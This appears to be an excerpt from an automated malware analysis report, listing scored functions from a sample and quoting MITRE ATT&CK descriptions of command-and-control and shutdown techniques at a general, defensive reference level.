Function 00405D6F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 76
stringwindowCOMMON

Function 00403148 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 162
COMMON

Function 004061C4 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00406A7C Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 35
COMMON

Function 0040141E Relevance: 7.6, APIs: 5, Instructions: 82
registryCOMMON

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre